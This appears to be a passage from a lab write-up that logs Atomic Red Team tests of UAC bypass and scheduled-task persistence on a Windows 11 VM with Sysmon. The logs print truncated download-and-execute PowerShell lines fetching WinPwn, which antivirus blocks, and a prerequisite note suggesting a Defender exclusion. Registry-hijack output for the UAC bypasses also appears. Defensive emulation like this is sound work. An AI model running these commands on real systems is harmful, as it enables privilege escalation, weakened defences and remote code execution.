CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell
Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell
CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories
CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute
CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe
Prerequisites met: T1548.002-8 Disable UAC using reg.exe
CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites not met: T1548.002-10 UACME Bypass Method 23
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites not met: T1548.002-11 UACME Bypass Method 31
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites not met: T1548.002-12 UACME Bypass Method 33
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites not met: T1548.002-13 UACME Bypass Method 34
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites not met: T1548.002-14 UACME Bypass Method 39
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites not met: T1548.002-15 UACME Bypass Method 56
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites not met: T1548.002-16 UACME Bypass Method 59
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites not met: T1548.002-17 UACME Bypass Method 61
        [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification
Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification
CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys
Prerequisites met: T1548.002-25 Disable UAC notification via registry keys
CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd
No Preqs Defined
GetPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell
No Preqs Defined
GetPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
No Preqs Defined
GetPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
No Preqs Defined
GetPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell
No Preqs Defined
GetPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
No Preqs Defined
GetPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
No Preqs Defined
GetPrereq's for: T1548.002-8 Disable UAC using reg.exe
No Preqs Defined
GetPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
No Preqs Defined
GetPrereq's for: T1548.002-10 UACME Bypass Method 23
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe")
Prereq successfully met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe")
GetPrereq's for: T1548.002-11 UACME Bypass Method 31
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe")
GetPrereq's for: T1548.002-12 UACME Bypass Method 33
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe")
GetPrereq's for: T1548.002-13 UACME Bypass Method 34
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe")
GetPrereq's for: T1548.002-14 UACME Bypass Method 39
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe")
GetPrereq's for: T1548.002-15 UACME Bypass Method 56
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe")
GetPrereq's for: T1548.002-16 UACME Bypass Method 59
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe")
GetPrereq's for: T1548.002-17 UACME Bypass Method 61
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe")
GetPrereq's for: T1548.002-18 WinPwn - UAC Magic
No Preqs Defined
GetPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
No Preqs Defined
GetPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
No Preqs Defined
GetPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
No Preqs Defined
GetPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
No Preqs Defined
GetPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification
No Preqs Defined
GetPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
No Preqs Defined
GetPrereq's for: T1548.002-25 Disable UAC notification via registry keys
No Preqs Defined
GetPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
No Preqs Defined
```
Run the test for a particular technique

```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout
The operation completed successfully.
Microsoft Windows [Version 10.0.22631.3155]
(c) Microsoft Corporation. All rights reserved.

C:\Users\vagrant\AppData\Local\Temp>
Exit code: 0
Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open

Name                           Property
----                           --------
command

Exit code: 0
Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing test: T1548.002-3 Bypass UAC using Fodhelper
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception

Exit code:
Done executing test: T1548.002-3 Bypass UAC using Fodhelper
Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name                           Property
----                           --------
command

DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name                           Property
----                           --------
command

DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
        1 file(s) copied.
symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe
Exit code: 0
Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute

    Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open

Name                           Property
----                           --------
command

(default)       : cmd.exe /c notepad.exe
DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-8 Disable UAC using reg.exe
Executing test: T1548.002-9 Bypass UAC using SilentCleanup task
The screen cannot be set to the number of lines and columns specified.
The operation completed successfully.
Access is denied.
Exit code: 0
Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing test: T1548.002-10 UACME Bypass Method 23
Exit code: 1073741845
Done executing test: T1548.002-10 UACME Bypass Method 23
Executing test: T1548.002-11 UACME Bypass Method 31
Exit code: 1073741845
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
Exit code: 1073741845
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
Exit code: 1073741845
Done executing test: T1548.002-13 UACME Bypass Method 34
Executing test: T1548.002-14 UACME Bypass Method 39
Exit code: 1073741845
Done executing test: T1548.002-14 UACME Bypass Method 39
Executing test: T1548.002-15 UACME Bypass Method 56
Exit code: 1073741845
Done executing test: T1548.002-15 UACME Bypass Method 56
Executing test: T1548.002-16 UACME Bypass Method 59
Exit code: 1073741845
Done executing test: T1548.002-16 UACME Bypass Method 59
Executing test: T1548.002-17 UACME Bypass Method 61
Exit code: 1073741845
Done executing test: T1548.002-17 UACME Bypass Method 61
Executing test: T1548.002-18 WinPwn - UAC Magic
iex : At line:1 char:1
+ # Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
At line:3 char:1

Exit code: 0
Done executing test: T1548.002-18 WinPwn - UAC Magic
Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
iex : At line:1 char:1
+ # Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

This script contains malicious content and has been blocked by your antivirus software.
Exit code: 0
Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
iex : At line:1 char:1
+ # Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Exit code: 0
Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
iex : At line:1 char:1
+ function dccuacbypass
+ ~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Exit code: 0
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Exit code: 0
Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Exit code: 0
Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Exit code: 0
Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-25 Disable UAC notification via registry keys
Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Clean-up on completion of the test

```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```

Attack emulation with ART [Agent windows 11] 🟒

T1053.005 – Scheduled Task/Job

GetPrereqs

```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1053.005 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
GetPrereq's for: T1053.005-1 Scheduled Task Startup Script
No Preqs Defined
GetPrereq's for: T1053.005-2 Scheduled task Local
No Preqs Defined
GetPrereq's for: T1053.005-3 Scheduled task Remote
No Preqs Defined
GetPrereq's for: T1053.005-4 Powershell Cmdlet Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-5 Task Scheduler via VBA
Attempting to satisfy prereq: Microsoft Word must be installed
You will need to install Microsoft Word manually to meet this requirement
Failed to meet prereq: Microsoft Word must be installed
GetPrereq's for: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml)
Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml
GetPrereq's for: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
No Preqs Defined
GetPrereq's for: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml)
Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml)
GetPrereq's for: T1053.005-9 PowerShell Modify A Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation
Attempting to satisfy prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
Prereq successfully met: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
Attempting to satisfy prereq: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"`
Prereq successfully met: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"`
```
Test run

```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1053.005
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1053.005-1 Scheduled Task Startup Script
SUCCESS: The scheduled task "T1053_005_OnLogon" has successfully been created.
SUCCESS: The scheduled task "T1053_005_OnStartup" has successfully been created.
Exit code: 0
Done executing test: T1053.005-1 Scheduled Task Startup Script
Executing test: T1053.005-2 Scheduled task Local
SUCCESS: The scheduled task "spawn" has successfully been created.
Exit code: 0
Done executing test: T1053.005-2 Scheduled task Local
Executing test: T1053.005-3 Scheduled task Remote
ERROR: No mapping between account names and security IDs was done.
Exit code: 1
Done executing test: T1053.005-3 Scheduled task Remote
Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task

TaskPath                                       TaskName                          State
--------                                       --------                          -----
\                                              AtomicTask                        Ready
Exit code: 0
Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing test: T1053.005-5 Task Scheduler via VBA
New-Object : Retrieving the COM class factory for component with CLSID {00000000-0000-0000-0000-000000000000} failed due to the following error: 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)).
At line:70 char:12
+     $app = New-Object -ComObject "$officeProduct.Application"
+            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [New-Object], COMException
    + FullyQualifiedErrorId : NoCOMClassIdentified,Microsoft.PowerShell.Commands.NewObjectCommand

New-Item : The registry key at the specified path does not exist.
At line:73 char:34
+     if (-not (Test-Path $key)) { New-Item $Key }
    + CategoryInfo          : InvalidArgument: (HKEY_CURRENT_US...oft\Office\Word:String) [New-Item], ArgumentException
    + FullyQualifiedErrorId : System.ArgumentException,Microsoft.PowerShell.Commands.NewItemCommand
+                                  ~~~~~~~~~~~~~
At line:74 char:5
Set-ItemProperty : Cannot find path 'HKCU:\Software\Microsoft\Office\Word\Security\' because it does not exist.
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (HKCU:\Software\...\Word\Security\:String) [Set-ItemProperty], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetItemPropertyCommand

You cannot call a method on a null-valued expression.
At line:84 char:9
+     Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1
+         $doc = $app.Documents.Add()
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:89 char:5
+     $comp = $doc.VBProject.VBComponents.Add(1)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:90 char:5
+     $comp.CodeModule.AddFromString($macroCode)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:91 char:5
+     $app.Run($sub)
+     ~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:92 char:5
+     $doc.Close(0)
+     ~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
+     $app.Quit()
+     ~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object."
At line:93 char:5
At line:94 char:5
+     [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) ...
